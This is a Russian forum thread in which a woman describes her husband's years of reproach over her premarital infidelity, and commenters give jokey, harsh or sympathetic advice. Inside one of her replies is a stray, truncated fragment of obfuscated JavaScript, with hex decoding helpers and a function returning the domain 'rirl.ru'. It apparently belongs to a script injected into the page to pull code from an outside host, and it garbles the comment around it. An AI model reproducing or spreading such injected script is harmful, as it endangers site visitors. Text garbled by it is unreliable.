2016-03-14 15:51:05

=Юля=, Автор я бы на вашем месте, ответил бы мужу как в анекдоте, *Жених говорит невесте после первой брачной ночи :-мама сказала что красное пятнышко должно остаться на простыне, на что невеста отвечает : скажи мама что у меня белокровие*{#}

Ответить
Поддерживаю Да1 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 16:13:11
2016-03-14 16:13:11

БесШаБаШнЫй ЭлЬф )), Я написала историю не для приколов. Просто реально не вижу решения. А вы просто забавляетесь.

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

14 марта 16:19:42
2016-03-14 16:19:42

=Юля=, Ну простите, я не специально, мне невольно анекдот вспмнился...{#} больше не буду...

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

14 марта 16:26:25
2016-03-14 16:26:25

=Юля=, а в решение сами виноваты, видите что зациклся, на прямой разговор сразу.. -. Видишь любимый мой, я за весь наш брак тебе повода не давала, и если ты будешь дальше продолжать эту волынку, то нам лучше разбежаться , дальше я не могу так...

Я уверен что он заткнется , но вам надо реально поставить вопрос ребром, а не оправдываться перед ним

Ответить
Поддерживаю Да3 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 16:34:46
2016-03-14 16:34:46

БесШаБаШнЫй ЭлЬф )), Да всё уже было. Уже и живём несколько лет раздельно, но вроде как вместе, всё равно вопросы, вопросы, вопросы. Легче не становится. Мне другие мужчины кроме мужа не интересны и не нужны.

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

14 марта 16:36:53
2016-03-14 16:36:53

=Юля=, прикол, я не понял... живёте несколько лет раздельно, в смысле секса вообще нет?{#}

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

14 марта 16:38:23
2016-03-14 16:38:23

=Юля=, дети есть у вас?

Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 17:09:59
2016-03-14 17:09:59

БесШаБаШнЫй ЭлЬф )), "Живём раздельно, но вроде как вместе" -это живём вроде как семьёй, но в разных квартирах.

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

14 марта 17:18:21
2016-03-14 17:18:21

=Юля=, Странные какие-то отношения у вас, может от жира беситесь уже, проблем нет, и решили создать их от скуки...{#}

Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 17:27:01
2016-03-14 17:27:01

БесШаБаШнЫй ЭлЬф )), Вы просто не вникли в суть: я не могу жить без мужа, но и слушать его упрёки и постоянные вопросы о моём единственном грешке я не могу. Жизнь - катастрофа.

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

14 марта 17:36:38
2016-03-14 17:36:38

=Юля=, Ну не знаю, скажите ему что он хочет, чтоб простил вам, в эпоху Ивана Грозного пороли жен плеткой за измену, предложите ему 50 хлыстов, может удовлетвориться тогда{#}

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

14 марта 18:03:23
2016-03-14 18:03:23

=Юля=, Не могу просто понять, за что вы его любите, если постоянно вас понукает, семья вроде есть и нет, живете раздельно, и уверен что вам изменяет без всякого угрызения совести, а сам вам внушил что вы продажная,... если бы к вам питал какие нибудь чувства, точно так бы не поступил, я посторонний мужчина и то жалостью к вам проникся, а вы мать его ребёнка, вас связывает столько в жизни мгновений , и все это он ставит на весы против того что сделали когда были совсем юной, не замужней девушкой... Простите .. но мне кажется или у него патология какая та.. или что то вы не договариваете...

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

15 марта 00:32:39
2016-03-15 00:32:39
ЭТО ОН НЕ БЕРЕГ ВАС.... А СДЕРЖАЛСЯ , ЗНАЛ ЖЕ ЧТО В АРМИЮ ПОЙДЕТ, ВОТ И ОСТАВИЛ ВАС НЕВИННУЮ, ЧТОБ ЗНАТЬ НАВЕРНЯКА ЧТО НЕ КОМУ НЕ ИЗМЕНЯЛИ!!!!!!!
Ответить
Поддерживаю Да2 / Нет0
Moody
20123 Moody
moody offline
Репутация : 138642
Комментариев 1220 7
15 марта 07:23:53
2016-03-15 07:23:53

=Юля=, согласна с Гостем, мне кажется это как в 9 роте, не спал с женой, чтобы наверняка знать, что не изменяла. По-моему вы чересчур боготворите мужа своего. Нет людей непорочных. У каждого за спиной есть что то. А вы уверены, что ваш муж не изменял вам?? Есть такие мужчины (да и женщины) если видят, что партнер чувствует вину и любит, так и будут кровь пить. Вы загоняетесь. За 10 лет брака этот вопрос надо было решить как то уже. Вы же не детки маленькие. Пока вы будете мучить себя чувством вины и считать мужа святым человеком, так оно и будет продолжаться. Мазохисты вы оба, честное слово.

Ответить
Поддерживаю Да2 / Нет0
Все люди хотят, чтобы было по ихнему. Но по ихнему не будет, потому что нет такого слова.
Гость
Гость

17 марта 21:15:30
2016-03-17 21:15:30
Тут некоторые набросились на автора, а я выступлю в ее защиту. То, что на изменила это плохо. Ну очень плохо. Я бы наверное не простила. Но этот парень простил и создал с ней семью. Простить - это значит забыть и больше не вспоминать. А если не было по другому, то тогда не нужно было и семью создавать. А теперь получается он каждый раз наказывает ее за это, это не прощение, это просто удовольствие от издевательства над кем то. Я значит такой хороший, женился на тебе, а ты такая плохая и должна мне всю жизнь отмаливать прощение. Этот муж ее лицемер. КОгда ты любишь человека, ты никогда не станешь причиной ее страданий. Если не смог простить, тогда не женись, если женился и простил тогда начни с чистого листа. Чтобы у вас был одинаковый счет, предложите ему тоже сходить на лево, тогда и вы его будете гнобить за это каждый день и он может успокоится. А вены не режьте, у вас не такой огромный грех. Вы же не человека убили. Все в этом мире можно изменить, кроме смерти. Некоторым парам даже нравится в браке изменять, для некоторых это как перчинка в отношениях. Я вот не понимаю, если вы счастливы зачем он ворошит прошлое своими дурацкими упреками.
Ответить
Поддерживаю Да2 / Нет0
Гость
Гость

24 мая 13:55:57
2016-05-24 13:55:57
Восстановите "девственность" ( операция доступная и не очень дорогая), пусть он будет у вас "первым" , и начните всё с систого листа. Может ему это хоть чуть чуть облегчит его обиду! Ведь , повторяет он этого, для того, чтобы что то сделали!! А не просто гоаорили. Удачи
Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
24 мая 17:59:02
2016-05-24 17:59:02

Гость, Дело не только в девственности, дело в факте измены. я уже здесь писала, что вопрос скорее в нравственной чистоте, муж считает, что если девушка любит, тем более хочет выйти за парня замуж, то никаких мыслей о других парнях быть не должно. А если и восстанавливать девстьвенность, то нужно было сразу, а искусителя в расход. У меня на работе все знали, что у меня парень есть в армии и муж считает, что все знали о моём грешке и плохо думают о нём, коли женился на бля.... И это уже не изменить.

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

25 мая 09:56:37
2016-05-25 09:56:37
За всё надо платить. Если он вас этим попрекает, то возможно сильно мучается сам. Вы думаете, что он вас хранил для кого-то другого? Тем более, это был первый раз. Вы же пишете, что ездили к нему, ждали. Зачем надо было делать глупость? Мужчины собственники. Вашу измену он воспринимает, как предательство и унижение, будто это его отымели... Но у вас вместе вся жизнь впереди, когда будет временами и трудно, чтобы доказать свои чувства, и что вы не лёгкая на передок обычная 'шкура'.
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

25 мая 09:57:19
2016-05-25 09:57:19
Упс. Пропустил, 10 лет вы в браке. Нет ну тут уже поталогия. Он действительно вас мучает. Мне тоже изменила будущая жена. Правда и отношений еще особых не было, я учился в другом городе, был ненадёжен, много гулял, даже спал с её подругой самой близкой, бросил её, т. е. она может и изменой это не считала, а началом новых отношений. Но меня до сих пор трясёт от того, что она кому-то отдалась. И быстро, случайно. Я вот пару месяцев ждал. Хотя на свой первый раз близости возможно у нее другие планы были. 14 лет мы женаты, она только школу закончила, когда сыграли свадьбу. Может, во время ссор первый год или два что-то высказывал, поначалу сложно мне давался брак, и вообще я тогда себя плохо вёл, но чтобы десяток лет этим корить... Хотя, повторюсь. Бомбит до сих пор, иногда даже спать не могу, если невовремя подумаю об этом или вспомню. Поэтому если так серьёзно он вас прессует, и вы мучаетесь, лучше развестись и строить новые отношения, пока вы ещё молода.
Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
25 мая 11:26:18
2016-05-25 11:26:18

Гость, Не 10, а более 10, уже под 20 лет женаты. И всё сложно... Даже во время секса муж спрашивает каково мне было с искусителем, думала ли я о нём, занималась ли я с ним тем, чем занимаюсь с ним, как я это делала и т. д. В общем вынос мозга конкретный. А развестись просто так и бытьодной нет желания да и возраст не пионерский, хотя выгляжу лет на 10 моложе. Наверное ещё не втретила достойную замену.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

26 мая 03:59:14
2016-05-26 03:59:14
=Юля=, А вы с ним говорили на эту тему же? Попробуйте более жёстко. Кто старое помянет, тому... в общем тут пора уже вам самой атаковать. Объснить, что вы его очень любите, но вот такое поведение-невыносимо. И или он прекращает вас попрекать и прощает, либо вы уходите. Если вы ему действительно нужна, а это так, он должен вести себя как мужчина. Выносить мозг столько лет - это совсем неправильно...
Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
26 мая 14:48:16
2016-05-26 14:48:16

Гость, В комментариях я писала, что длительное время живём отдельно, он думает о себе, аяо нём - не помогает.

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

26 мая 14:53:43
2016-05-26 14:53:43

=Юля=, У Вас есть только один выход.... пойти по настоящему ему изменить и сказать ему об этом, добавив что теперь хоть не обидно будет слушать нотации....

Даю вам слово.... он заткнется надолго....

Ответить
Поддерживаю Да3 / Нет0
Moody
20123 Moody
moody offline
Репутация : 138642
Комментариев 1220 7
26 мая 15:06:03
2016-05-26 15:06:03

=Юля=, по моему, ваш муж мазохист. И вампир плюс к этому энергетический. Он как мне кажется упивается вашим чувством вины. И пока вы признаете свою вину, и искупаете ее, так и будет. Плюньте вы уже на все это и рассатньтесь с ним. Любящий человек давно простил бы. А он вас мучает своей великой добродетелью.

Ответить
Поддерживаю Да1 / Нет0
Все люди хотят, чтобы было по ихнему. Но по ихнему не будет, потому что нет такого слова.
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
26 мая 15:07:55
2016-05-26 15:07:55

БесШаБаШнЫй ЭлЬф )), Опять юморите? Читайте внимательно комментарии.

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

26 мая 15:31:37
2016-05-26 15:31:37

{#}Почему когда пишу серьёзно, все за юмор принимают, а когда шучу за всерьёз{#}

Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
26 мая 15:42:00
2016-05-26 15:42:00

БесШаБаШнЫй ЭлЬф )), Я писала, что: 1. Живём раздельно, 2. Мне никто не нужен кроме мужа, 3. Во время секса муж интересуется как это было с другим. 4. Изменить для того, чтобы упрёки удвоились или утроились???

Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
26 мая 15:46:58
2016-05-26 15:46:58

Moody, Расстаться? Вы не поняли главного - дело в том, что я его люблю.

Ответить
Поддерживаю Да0 / Нет0
Наталья
Наталья

26 мая 16:46:41
2016-05-26 16:46:41
Сам святой и непорочный. Это его ожидания. Перфекционист и зануда. Мог бы за столько лет уже мозги не выносить. Ненавижу таких типа святош. Ситуации всякие бывают и все мы люди . А мужчин идеальных святош вообще в природе не существует. Хоть в мыслях , хоть во взгляде но похоть присутствует.
Ответить
Поддерживаю Да2 / Нет0
Moody
20123 Moody
moody offline
Репутация : 138642
Комментариев 1220 7
26 мая 16:55:03
2016-05-26 16:55:03

=Юля=, я поняла, что любите. Но ваша любовь к нему как показывает практика уже 10 лет как ничего не поменяла. Он все так же мучает вас. Еще и живете теперь отдельно. А вы уверены, что он вас любит и что он вам никогда не изменял? Он вам до такой степени внушил, как сильно вы виноваты, что вы адекватно ситуацию перестали оценивать. Вы боитесь его потерять. А он знает это и пользуется этим. На вашем месте я бы уже давно развернулась и ушла. Нужно бороться, когда есть за что. В вашем случае ваша борьба за него это глупо. Женщина не должна бороться за мужчину. Ни при каких обстоятельствах.

Ответить
Поддерживаю Да0 / Нет0
Все люди хотят, чтобы было по ихнему. Но по ихнему не будет, потому что нет такого слова.
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
27 мая 09:54:42
2016-05-27 09:54:42

Moody, Не то, что неуверена, а уверена в том, что у него бывают женщины. Говорила ему неоднократно, что человек который любит всё простит, но он об этом не хочет слушать, считает, что смалодушничал не воспользовашись близостью и моим желанием выйти за него замуж, а я постчитала его тряпкой и отдалась другому. А по поводу любви, так это не просто слепое чувство девочки к красивому мальчику. Человека любишь в целом за его воспитание, манеры, привычки, вкусы, отношения. У моего мужа единственный бзик - моя измена с которой он не может смириться. Для него это была не просто измена, для него это унижение. Он не может понять как девушка, которая до 20 лет была девственницей и хотела выйти за него замуж могла лишиться девственности с другим и постоянно об это пытает.

Ответить
Поддерживаю Да0 / Нет0
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке